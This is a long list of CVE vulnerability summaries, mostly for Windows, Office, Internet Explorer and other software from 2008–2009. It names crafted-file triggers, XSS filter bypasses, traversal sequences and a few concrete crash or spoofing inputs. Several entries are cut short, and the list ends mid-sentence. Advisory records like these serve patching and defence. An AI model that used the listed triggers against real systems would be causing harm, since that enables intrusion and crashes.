Microsoft .NET Framework 1.0 SP3, 1.1 SP1, and 2.0 SP1 does not properly validate .NET verifiable code, which allows remote attackers to obtain unintended access to stack memory, and execute arbitrary code, via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft .NET Framework Pointer Verification Vulnerability." [CVE-2009-0088] The WordPerfect 6.x Converter (WPFT632.CNV, 1998.1.27.0) in Microsoft Office Word 2000 SP3 and Microsoft Office Converter Pack does not properly validate the length of an unspecified string, which allows remote attackers to execute arbitrary code via a crafted WordPerfect 6.x file, related to an unspecified counter and control structures on the stack, aka "Word 2000 WordPerfect 6.x Converter Stack Corruption Vulnerability." [CVE-2009-0084] Use-after-free vulnerability in DirectShow in Microsoft DirectX 8.1 and 9.0 allows remote attackers to execute arbitrary code via an MJPEG file or video stream with a malformed Huffman table, which triggers an exception that frees heap memory that is later accessed, aka "MJPEG Decompression Vulnerability." [CVE-2009-0080] The ThreadPool class in Windows Vista Gold and SP1, and Server 2008, does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by leveraging incorrect thread ACLs to access the resources of one of the processes, aka "Windows Thread Pool ACL Weakness Vulnerability." [CVE-2009-0077] The firewall engine in Microsoft Forefront Threat Management Gateway, Medium Business Edition (TMG MBE) [CVE-2009-0076] Microsoft Internet Explorer 7, when XHTML strict mode is used, allows remote attackers to execute arbitrary code via the zoom style directive in conjunction with unspecified other directives in a malformed Cascading Style Sheets (CSS) stylesheet in a crafted HTML document, aka "CSS Memory Corruption Vulnerability." [CVE-2009-0075] Microsoft Internet Explorer 7 does not properly handle errors during attempted access to deleted objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to CFunctionPointer and the appending of document objects, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0072] Microsoft Internet Explorer 6.0 through 8.0 beta2 allows remote attackers to cause a denial of service (application crash) via an onload=screen[""] attribute value in a BODY element. [CVE-2009-0016] Apple iTunes before 8.1 on Windows allows remote attackers to cause a denial of service (infinite loop) via a Digital Audio Access Protocol (DAAP) message with a crafted Content-Length header. [CVE-2009-0008] Unspecified vulnerability in Apple QuickTime MPEG-2 Playback Component before 7.60.92.0 on Windows allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted MPEG-2 movie. [CVE-2008-7295] Microsoft Internet Explorer cannot properly restrict modifications to cookies established in HTTPS sessions, which allows man-in-the-middle attackers to overwrite or delete arbitrary cookies via a Set-Cookie header in an HTTP response, related to lack of the HTTP Strict Transport Security (HSTS) includeSubDomains feature, aka a "cookie forcing" issue. [CVE-2008-7292] Bugzilla 2.20.x before 2.20.5, 2.22.x before 2.22.3, and 3.0.x before 3.0.3 on Windows does not delete the temporary files associated with uploaded attachments, which allows local users to obtain sensitive information by reading these files, a different vulnerability than CVE-2011-2977. [CVE-2008-7217] Microsoft Office 2008 for Mac, when running on Macintosh systems that restrict Office access to administrators, does not enforce this restriction for user ID 502, which allows local users with that ID to bypass intended security policy and access Office programs, related to permissions and ownership for certain directories. [CVE-2008-7211] CreativeLabs es1371mp.sys 5.1.3612.0 WDM audio driver, as used in Ensoniq PCI 1371 sound cards and when running on Windows Vista, does not create a Functional Device Object (FDO) to prevent user-moade access to the Physical Device Object (PDO), which allows local users to gain SYSTEM privileges via a crafted IRP request that dereferences a NULL FsContext pointer. [CVE-2008-7194] Unspecified vulnerability in Fujitsu Interstage HTTP Server, as used in Interstage Application Server 5.0, 7.0, 7.0.1, and 8.0.0 for Windows, allows attackers to cause a denial of service via a crafted request. [CVE-2008-7106] The installation of Sophos PureMessage for Microsoft Exchange 3.0 before 3.0.2, when both anti-virus and anti-spam are supported, does not create or launch the associated scan engines when the system is under heavy load, which has unspecified impact, probably remote bypass of scanner protection or a denial of service (message loss or delay). [CVE-2008-7105] Sophos PureMessage for Microsoft Exchange 3.0 before 3.0.2 allows remote attackers to cause a denial of service (EdgeTransport.exe termination) via a TNEF-encoded message with a crafted rich text body that is not properly handled during conversion to plain text. NOTE: this might be related to CVE-2008-7104. [CVE-2008-7104] Sophos PureMessage Scanner service (PMScanner.exe) in PureMessage for Microsoft Exchange 3.0 before 3.0.2 allows remote attackers to cause a denial of service (message queue delay and incomplete spam rule update) via a crafted (1) RTF or (2) PDF file. [CVE-2008-7064] Directory traversal vulnerability in the get_lang function in global.php in Quicksilver Forums 1.4.2 and earlier, as used in QSF Portal before 1.4.5, when running on Windows, allows remote attackers to include and execute arbitrary local files via a "\" (backslash) in the lang parameter to index.php, which bypasses a protection mechanism that only checks for "/" (forward slash), as demonstrated by uploading and including PHP code in an avatar file. [CVE-2008-7037] The Sidebar gadget in ITN News Gadget (aka ITN Hub Gadget) 1.06 for Windows Vista, and possibly other versions before 1.23, allows remote web servers or man-in-the-middle attackers to execute arbitrary commands via script in a short_title response. [CVE-2008-6938] Pi3Web 2.0.3 before PL2, when installed on Windows as a desktop application and without using the Pi3Web/Conf/Intenet.pi3, allows remote attackers to cause a denial of service (crash or hang) and obtain the full pathname of the server via a request to a file in the ISAPI directory that is not an executable DLL, which triggers the crash when the DLL load fails, as demonstrated using Isapi\users.txt. [CVE-2008-6903] Sophos Anti-Virus for Windows before 7.6.3, Anti-Virus for Windows NT/9x before 4.7.18, Anti-Virus for OS X before 4.9.18, Anti-Virus for Linux before 6.4.5, Anti-Virus for UNIX before 7.0.5, Anti-Virus for Unix and Netware before 4.37.0, Sophos EM Library, and Sophos small business solutions, when CAB archive scanning is enabled, allows remote attackers to cause a denial of service (segmentation fault) via a "fuzzed" CAB archive file, as demonstrated by the OUSPG PROTOS GENOME test suite for Archive Formats. [CVE-2008-6820] The db2fmp process in IBM DB2 8 before FP17, 9.1 before FP5, and 9.5 before FP2 on Windows runs with "OS privilege," which has unknown impact and attack vectors, a different vulnerability than CVE-2008-3856. [CVE-2008-6561] Citrix Presentation Server Client for Windows before 10.200 does not clear "credential information" from process memory in unspecified circumstances, which might allow local users to gain privileges. [CVE-2008-6219] nsrexecd.exe in multiple EMC Networker products including EMC NetWorker Server, Storage Node, and Client 7.3.x and 7.4, 7.4.1, 7.4.2, Client and Storage Node for Open VMS 7.3.2 ECO6 and earlier, Module for Microsoft Exchange 5.1 and earlier, Module for Microsoft Applications 2.0 and earlier, Module for Meditech 2.0 and earlier, and PowerSnap 2.4 SP1 and earlier does not properly control the allocation of memory, which allows remote attackers to cause a denial of service (memory exhaustion) via multiple crafted RPC requests. [CVE-2008-6063] Microsoft Word 2007, when the "Save as PDF" add-on is enabled, places an absolute pathname in the Subject field during an "Email as PDF" operation, which allows remote attackers to obtain sensitive information such as the sender's account name and a Temporary Internet Files subdirectory name. [CVE-2008-5912] An unspecified function in the JavaScript implementation in Microsoft Internet Explorer creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-5821] Memory leak in WebKit.dll in WebKit, as used by Apple Safari 3.2 on Windows Vista SP1, allows remote attackers to cause a denial of service (memory consumption and browser crash) via a long ALINK attribute in a BODY element in an HTML document. [CVE-2008-5787] Directory traversal vulnerability in mod.php in Arab Portal 2.1 on Windows allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, in conjunction with a show action. [CVE-2008-5749] DISPUTED Argument injection vulnerability in Google Chrome 1.0.154.36 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. NOTE: a third party disputes this issue, stating that Chrome "will ask for user permission" and "cannot launch the applet even [if] you have given out the permission." [CVE-2008-5717] Cross-site scripting (XSS) vulnerability in Hitachi JP1/Integrated Management - Service Support 08-10 through 08-10-05, 08-11 through 08-11-03, and 08-50 through 08-50-03 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5715] Mozilla Firefox 3.0.5 on Windows Vista allows remote attackers to cause a denial of service (application crash) via JavaScript code with a long string value for the hash property (aka location.hash). NOTE: it was later reported that earlier versions are also affected, and that the impact is CPU consumption and application hang in unspecified circumstances perhaps involving other platforms. [CVE-2008-5556] DISPUTED ** The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not recognize attack patterns designed to operate against web pages that are encoded with utf-7, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting crafted utf-7 content. NOTE: the vendor reportedly disputes this issue, stating "Behaviour is by design." [CVE-2008-5555] Microsoft Internet Explorer 8.0 Beta 2 relies on the XDomainRequestAllowed HTTP header to authorize data exchange between domains, which allows remote attackers to bypass the product's XSS Filter protection mechanism, and conduct XSS and cross-domain attacks, by injecting this header after a CRLF sequence, related to "XDomainRequest Allowed Injection (XAI)." NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5554] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 does not properly handle some HTTP headers that appear after a CRLF sequence in a URI, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS or redirection attacks, as demonstrated by the (1) Location and (2) Set-Cookie HTTP headers. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5553] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 disables itself upon encountering a certain X-XSS-Protection HTTP header, which allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting this header after a CRLF sequence. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5552] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks via a CRLF sequence in conjunction with a crafted Content-Type header, as demonstrated by a header with a utf-7 charset value. NOTE: the vendor has reportedly stated that the XSS Filter intentionally does not attempt to "address every conceivable XSS attack scenario." [CVE-2008-5551] The XSS Filter in Microsoft Internet Explorer 8.0 Beta 2 allows remote attackers to bypass the XSS protection mechanism and conduct XSS attacks by injecting data at two different positions within an HTML document, related to STYLE elements and the CSS expression property, aka a "double injection." [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet) [CVE-2008-5439] Unspecified vulnerability in the SQLPlus Windows GUI component in Oracle Database 10.2.0.4 allows remote authenticated users to affect confidentiality via unknown vectors. [CVE-2008-5428] Opera 9.51 on Windows XP does not properly handle (1) multipart/mixed e-mail messages with many MIME parts and possibly (2) e-mail messages with many "Content-type: message/rfc822 [CVE-2008-5424] The MimeOleClearDirtyTree function in InetComm.dll in Microsoft Outlook Express 6.00.2900.5512 does not properly handle (1) multipart/mixed e-mail messages with many MIME parts and possibly (2) e-mail messages with many "Content-type: message/rfc822 [CVE-2008-5423] Sun Sun Ray Server Software 3.x and 4.0 and Sun Ray Windows Connector 1.1 and 2.0 expose the LDAP password during a configuration step, which allows local users to discover the Sun Ray administration password, and obtain admin access to the Data Store and Administration GUI, via unspecified vectors related to the utconfig component of the Server Software and the uttscadm component of the Windows Connector. [CVE-2008-5416] Heap-based buffer overflow in Microsoft SQL Server 2000 SP4, 8.00.2050, 8.00.2039, and earlier [CVE-2008-5415] The LDBserver service in the server in CA ARCserve Backup 11.1 through 12.0 on Windows allows remote attackers to execute arbitrary code via a handle_t argument to an RPC endpoint in which the argument refers to an incompatible procedure. [CVE-2008-5412] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows has unknown impact and attack vectors related to JSPs. NOTE: this is probably a duplicate of CVE-2009-0438. [CVE-2008-5408] Buffer overflow in the data management protocol in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allows remote authenticated users to cause a denial of service (application crash) and possibly execute arbitrary code via unknown vectors. NOTE: this can be exploited by unauthenticated remote attackers by leveraging CVE-2008-5407. [CVE-2008-5407] Multiple unspecified vulnerabilities in the Backup Exec remote-agent logon process in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allow remote attackers to bypass authentication, and read or delete files, via unknown vectors. [CVE-2008-5326] The ClearQuest Maintenance Tool in IBM Rational ClearQuest 7.0.0 before 7.0.0.4 and 7.0.1 before 7.0.1.3 on Windows allows local users to obtain (1) user and (2) database passwords by using a password revealer utility on a field containing a series of asterisks. [CVE-2008-5315] Directory traversal vulnerability in the web interface in Apple iPhone Configuration Web Utility 1.0 on Windows allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2008-5181] Microsoft Communicator allows remote attackers to cause a denial of service (application or device outage) via instant messages containing large numbers of emoticons. [CVE-2008-5180] Microsoft Communicator, and Communicator in Microsoft Office 2010 beta, allows remote attackers to cause a denial of service (memory consumption) via a large number of SIP INVITE requests, which trigger the creation of many sessions. [CVE-2008-5178] Heap-based buffer overflow in Opera 9.62 on Windows allows remote attackers to execute arbitrary code via a long file:// URI. NOTE: this might overlap CVE-2008-5680. [CVE-2008-5100] The strong name (SN) implementation in Microsoft .NET Framework 2.0.50727 relies on the digital signature Public Key Token embedded in the pathname of a DLL file instead of the digital signature of this file itself, which makes it easier for attackers to bypass Global Assembly Cache (GAC) and Code Access Security (CAS) protection mechanisms, aka MSRC ticket MSRC8566gs. [CVE-2008-5038] Use-after-free vulnerability in the NetWare Core Protocol (NCP) feature in Novell eDirectory 8.7.3 SP10 before 8.7.3 SP10 FTF1 and 8.8 SP2 for Windows allows remote attackers to cause a denial of service and possibly execute arbitrary code via a sequence of "Get NCP Extension Information By Name" requests that cause one thread to operate on memory after it has been freed in another thread, which triggers memory corruption, aka Novell Bug 373852. [CVE-2008-5026] Microsoft SharePoint uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading HTML documents. [CVE-2008-4946] convirt 0.8.2 allows local users to overwrite arbitrary files via a symlink attack on the /tmp/set_output temporary file, related to the (1) _template_/provision.sh, (2) Linux_CD_Install/provision.sh, (3) Fedora_PV_Install/provision.sh, (4) CentOS_PV_Install/provision.sh, (5) common/provision.sh, (6) example/provision.sh, and (7) Windows_CD_Install/provision.sh scripts in image_store/. [CVE-2008-4922] Buffer overflow in the DjVu ActiveX Control 3.0 for Microsoft Office (DjVu_ActiveX_MSOffice.dll) allows remote attackers to execute arbitrary code via a long (1) ImageURL property, and possibly the (2) Mode, (3) Page, or (4) Zoom properties. [CVE-2008-4844] Use-after-free vulnerability in the CRecordInstance::TransferToDestination function in mshtml.dll in Microsoft Internet Explorer 5.01, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via DSO bindings involving (1) an XML Island, (2) XML DSOs, or (3) Tabular Data Control (TDC) in a crafted HTML or XML document, as demonstrated by nested SPAN or MARQUEE elements, and exploited in the wild in December 2008. [CVE-2008-4837] Stack-based buffer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4820] Unspecified vulnerability in the Flash Player ActiveX control in Adobe Flash Player 9.0.124.0 and earlier on Windows allows attackers to obtain sensitive information via unknown vectors. [CVE-2008-4816] Unspecified vulnerability in the Download Manager in Adobe Reader 8.1.2 and earlier on Windows allows remote attackers to change Internet Security options on a client machine via unknown vectors. [CVE-2008-4800] The DebugDiag ActiveX control in CrashHangExt.dll, possibly 1.0, in Microsoft Debug Diagnostic Tool allows remote attackers to cause a denial of service (NULL pointer dereference and Internet Explorer 6.0 crash) via a large negative integer argument to the GetEntryPointForThread method. NOTE: this issue might only be exploitable in limited environments or non-default browser settings. [CVE-2008-4788] Microsoft Internet Explorer 6 omits high-bit URL-encoded characters when displaying the address bar, which allows remote attackers to spoof the address bar via a URL with a domain name that differs from an important domain name only in these characters, as demonstrated by using exam%A9ple.com to spoof example.com, aka MSRC ticket MSRC7900. [CVE-2008-4787] Visual truncation vulnerability in Microsoft Internet Explorer 6 allows remote attackers to spoof the address bar via a URL with a hostname containing many &nbsp [CVE-2008-4582] Mozilla Firefox 3.0.1 through 3.0.3, Firefox 2.x before 2.0.0.18, and SeaMonkey 1.x before 1.1.13, when running on Windows, do not properly identify the context of Windows .url shortcut files, which allows user-assisted remote attackers to bypass the Same Origin Policy and obtain sensitive information via an HTML document that is directly accessible through a filesystem, as demonstrated by documents in (1) local folders, (2) Windows share folders, and (3) RAR archives, and as demonstrated by IFRAMEs referencing shortcuts that point to (a) about:cache?device=memory and (b) about:cache?device=disk, a variant of CVE-2008-2810. [CVE-2008-4562] Buffer overflow in the ovlaunch CGI program in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 on Windows allows remote attackers to execute arbitrary code via a crafted Host parameter. NOTE: this issue may be partially covered by CVE-2009-0205. [CVE-2008-4544] Unspecified vulnerability in an unspecified Microsoft API, as used by Cisco Unity and possibly other products, allows remote attackers to cause a denial of service by sending crafted packets to dynamic UDP ports, related to a "processing error." [CVE-2008-4540] Windows Mobile 6 on the HTC Hermes device makes WLAN passwords available to an auto-completion mechanism for the password input field, which allows physically proximate attackers to bypass password authentication and obtain WLAN access. [CVE-2008-4493] Microsoft PicturePusher ActiveX control (PipPPush.DLL 7.00.0709), as used in Microsoft Digital Image 2006 Starter Edition, allows remote attackers to force the upload of arbitrary files by using the AddString and Post methods and a modified PostURL to construct an HTTP POST request. NOTE: this issue might only be exploitable in limited environments or non-default browser settings. [CVE-2008-4473] Multiple heap-based buffer overflows in Adobe Flash CS3 Professional on Windows and Flash MX 2004 allow remote attackers to execute arbitrary code via an SWF file containing long control parameters. [CVE-2008-4450] Cross-site scripting (XSS) vulnerability in adodb.php in XAMPP for Windows 1.6.8 allows remote attackers to inject arbitrary web script or HTML via the (1) dbserver, (2) host, (3) user, (4) password, (5) database, and (6) table parameters. NOTE: the provenance of this information is unknown [CVE-2008-4411] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.15.210 on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2008-1663. [CVE-2008-4381] Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (application crash) via Javascript that calls the alert function with a URL-encoded string of a large number of invalid characters. [CVE-2008-4324] The user interface event dispatcher in Mozilla Firefox 3.0.3 on Windows XP SP2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a series of keypress, click, onkeydown, onkeyup, onmousedown, and onmouseup events. NOTE: it was later reported that Firefox 3.0.2 on Mac OS X 10.5 is also affected. [CVE-2008-4301] * DISPUTED ** A certain ActiveX control in iisext.dll in Microsoft Internet Information Services (IIS) allows remote attackers to set a password via a string argument to the SetPassword method. NOTE: this issue could not be reproduced by a reliable third party. In addition, the original researcher is unreliable. Therefore the original disclosure is probably erroneous. [CVE-2008-4300] A certain ActiveX control in adsiis.dll in Microsoft Internet Information Services (IIS) allows remote attackers to cause a denial of service (browser crash) via a long string in the second argument to the GetObject method. NOTE: this issue was disclosed by an unreliable researcher, so it might be incorrect. [CVE-2008-4299] A certain ActiveX control in the Microsoft Internet Authentication Service (IAS) Helper COM Component in iashlpr.dll allows remote attackers to cause a denial of service (browser crash) via a large integer value in the first argument to the PutProperty method. NOTE: this issue was disclosed by an unreliable researcher, so it might be incorrect. [CVE-2008-4293] Unspecified vulnerability in Opera before 9.52 on Windows, when registered as a protocol handler, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors in which Opera is launched by other applications. [CVE-2008-4278] VMware VirtualCenter 2.5 before Update 3 build 119838 on Windows displays a user's password in cleartext when the password contains unspecified special characters, which allows physically proximate attackers to steal the password. [CVE-2008-4266] Array index vulnerability in Microsoft Office Excel 2000 SP3, 2002 SP3, and 2003 SP3 [CVE-2008-4265] Microsoft Office Excel 2000 SP3 allows remote attackers to execute arbitrary code via a crafted Excel spreadsheet that contains a malformed object, which triggers memory corruption during the loading of records from this spreadsheet, aka "File Format Parsing Vulnerability." [CVE-2008-4264] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4260] Microsoft Internet Explorer 7 sometimes attempts to access a deleted object, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2008-4259] Microsoft Internet Explorer 7 sometimes attempts to access uninitialized memory locations, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, related to a WebDAV request for a file with a long name, aka "HTML Objects Memory Corruption Vulnerability." [CVE-2008-4258] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 does not properly validate parameters during calls to navigation methods, which allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, aka "Parameter Validation Memory Corruption Vulnerability." [CVE-2008-4256] The Charts ActiveX control in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "Charts Control Memory Corruption Vulnerability." [CVE-2008-4254] Multiple integer overflows in the Hierarchical FlexGrid ActiveX control (mshflxgd.ocx) in Microsoft Visual Basic 6.0 and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 allow remote attackers to execute arbitrary code via crafted (1) Rows and (2) Cols properties to the (a) ExpandAll and (b) CollapseAll methods, related to access of incorrectly initialized objects and corruption of the "system state," aka "Hierarchical FlexGrid Control Memory Corruption Vulnerability." [CVE-2008-4253] The FlexGrid ActiveX control in Microsoft Visual Basic 6.0, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, Office FrontPage 2002 SP3, and Office Project 2003 SP3 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "FlexGrid Control Memory Corruption Vulnerability." [CVE-2008-4252] The DataGrid ActiveX control in Microsoft Visual Basic 6.0 and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 does not properly handle errors during access to incorrectly initialized objects, which allows remote attackers to execute arbitrary code via a crafted HTML document, related to corruption of the "system state," aka "DataGrid Control Memory Corruption Vulnerability." [CVE-2008-4211] Integer signedness error in (1) QuickLook in Apple Mac OS X 10.5.5 and (2) Office Viewer in Apple iPhone OS 1.0 through 2.1 and iPhone OS for iPod touch 1.1 through 2.1 allows remote attackers to cause a denial of service (application termination) and execute arbitrary code via a crafted Microsoft Excel file that triggers an out-of-bounds memory access, related to "handling of columns." [CVE-2008-4197] Opera before 9.52 on Windows, Linux, FreeBSD, and Solaris, when processing custom shortcut and menu commands, can produce argument strings that contain uninitialized memory, which might allow user-assisted remote attackers to execute arbitrary code or conduct other attacks via vectors related to activation of a shortcut. [CVE-2008-4163] Unspecified vulnerability in ISC BIND 9.3.5-P2-W1, 9.4.2-P2-W1, and 9.5.0-P2-W1 on Windows allows remote attackers to cause a denial of service (UDP client handler termination) via unknown vectors. [CVE-2008-4110] Buffer overflow in the SQLVDIRLib.SQLVDirControl ActiveX control in Tools\Binn\sqlvdir.dll in Microsoft SQL Server 2000 (aka SQL Server 8.0) allows remote attackers to cause a denial of service (browser crash) or possibly execute arbitrary code via a long URL in the second argument to the Connect method. NOTE: this issue is not a vulnerability in many environments, since the control is not marked as safe for scripting and would not execute with default Internet Explorer settings. [CVE-2008-4033] Cross-domain vulnerability in Microsoft XML Core Services 3.0 through 6.0, as used in Microsoft Expression Web, Office, Internet Explorer, and other products, allows remote attackers to obtain sensitive information from another domain and corrupt the session state via HTTP request header fields, as demonstrated by the Transfer-Encoding field, aka "MSXML Header Request Vulnerability." [CVE-2008-4032] Microsoft Office SharePoint Server 2007 Gold and SP1 and Microsoft Search Server 2008 do not properly perform authentication and authorization for administrative functions, which allows remote attackers to cause a denial of service (server load), obtain sensitive information, and "create scripts that would run in the context of the site" via requests to administrative URIs, aka "Access Control Vulnerability." [CVE-2008-4031] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4030] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4029] Cross-domain vulnerability in Microsoft XML Core Services 3.0 and 4.0, as used in Internet Explorer, allows remote attackers to obtain sensitive information from another domain via a crafted XML document, related to improper error checks for external DTDs, aka "MSXML DTD Cross-Domain Scripting Vulnerability." [CVE-2008-4028] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4027] Double free vulnerability in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4026] Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4025] Integer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1 [CVE-2008-4024] Microsoft Office Word 2000 SP3 and 2002 SP3 and Office 2004 for Mac allow remote attackers to execute arbitrary code via a Word document with a crafted lcbPlcfBkfSdt field in the File Information Block (FIB), which bypasses an initialization step and triggers an "arbitrary free," aka "Word Memory Corruption Vulnerability." [CVE-2008-4020] Cross-site scripting (XSS) vulnerability in Microsoft Office XP SP3 allows remote attackers to inject arbitrary web script or HTML via a document that contains a "Content-Disposition: attachment" header and is accessed through a cdo: URL, which renders the content instead of raising a File Download dialog box, aka "Vulnerability in Content-Disposition Header Vulnerability." [CVE-2008-4019] Integer overflow in the REPT function in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2 and SP3, and 2007 Gold and SP1 [CVE-2008-3973] Unspecified vulnerability in the SQLPlus Windows GUI component in Oracle Database allows local users to affect confidentiality via unknown vectors. [CVE-2008-3956] orgchart.exe in Microsoft Organization Chart 2.00 allows user-assisted attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .opx file. [CVE-2008-3897] DiskCryptor 0.2.6 on Windows stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer before and after use, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3851] Multiple directory traversal vulnerabilities in Pluck CMS 4.5.2 on Windows allow remote attackers to include and execute arbitrary local files via a ..\ (dot dot backslash) in the (1) blogpost, (2) cat, and (3) file parameters to data/inc/themes/predefined_variables.php, as reachable through index.php [CVE-2008-3843] Request Validation (aka the ValidateRequest filters) in ASP.NET in Microsoft .NET Framework with the MS07-040 update does not properly detect dangerous client input, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated by a query string containing a "<~/" (less-than tilde slash) sequence followed by a crafted STYLE element. [CVE-2008-3842] Request Validation (aka the ValidateRequest filters) in ASP.NET in Microsoft .NET Framework without the MS07-040 update does not properly detect dangerous client input, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated by a query string containing a "</" (less-than slash) sequence. [CVE-2008-3704] Heap-based buffer overflow in the MaskedEdit ActiveX control in Msmask32.ocx 6.0.81.69, and possibly other versions before 6.0.84.18, in Microsoft Visual Studio 6.0, Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, and Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2 allows remote attackers to execute arbitrary code via a long Mask parameter, related to not "validating property values with boundary checks," as exploited in the wild in August 2008, aka "Masked Edit Control Memory Corruption Vulnerability." [CVE-2008-3703] The management console in the Volume Manager Scheduler Service (aka VxSchedService.exe) in Symantec Veritas Storage Foundation for Windows (SFW) 5.0, 5.0 RP1a, and 5.1 accepts NULL NTLMSSP authentication, which allows remote attackers to execute arbitrary code via requests to the service socket that create "snapshots schedules" registry values specifying future command execution. NOTE: this issue exists because of an incomplete fix for CVE-2007-2279. [CVE-2008-3698] Unspecified vulnerability in the OpenProcess function in VMware Workstation 5.5.x before 5.5.8 build 108000, VMware Workstation 6.0.x before 6.0.5 build 109488, VMware Player 1.x before 1.0.8 build 108000, VMware Player 2.x before 2.0.5 build 109488, VMware ACE 1.x before 1.0.7 build 108880, VMware ACE 2.x before 2.0.5 build 109488, and VMware Server before 1.0.7 build 108231 on Windows allows local host OS users to gain privileges on the host OS via unknown vectors. [CVE-2008-3635] Stack-based buffer overflow in QuickTimeInternetExtras.qtx in an unspecified third-party Indeo v3.2 (aka IV32) codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. [CVE-2008-3630] mDNSResponder in Apple Bonjour for Windows before 1.0.5, when an application uses the Bonjour API for unicast DNS, does not choose random values for transaction IDs or source ports in DNS requests, which makes it easier for remote attackers to spoof DNS responses, a different vulnerability than CVE-2008-1447. [CVE-2008-3628] Apple QuickTime before 7.5.5 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image, related to an "invalid pointer issue." [CVE-2008-3623] Heap-based buffer overflow in CoreGraphics in Apple Safari before 3.2 on Windows, in iPhone OS 1.0 through 2.2.1, and in iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted image, related to improper handling of color spaces. [CVE-2008-3615] ir50_32.qtx in an unspecified third-party Indeo v5 codec for QuickTime, when used with Apple QuickTime before 7.5.5 on Windows, accesses uninitialized memory, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. [CVE-2008-3614] Integer overflow in Apple 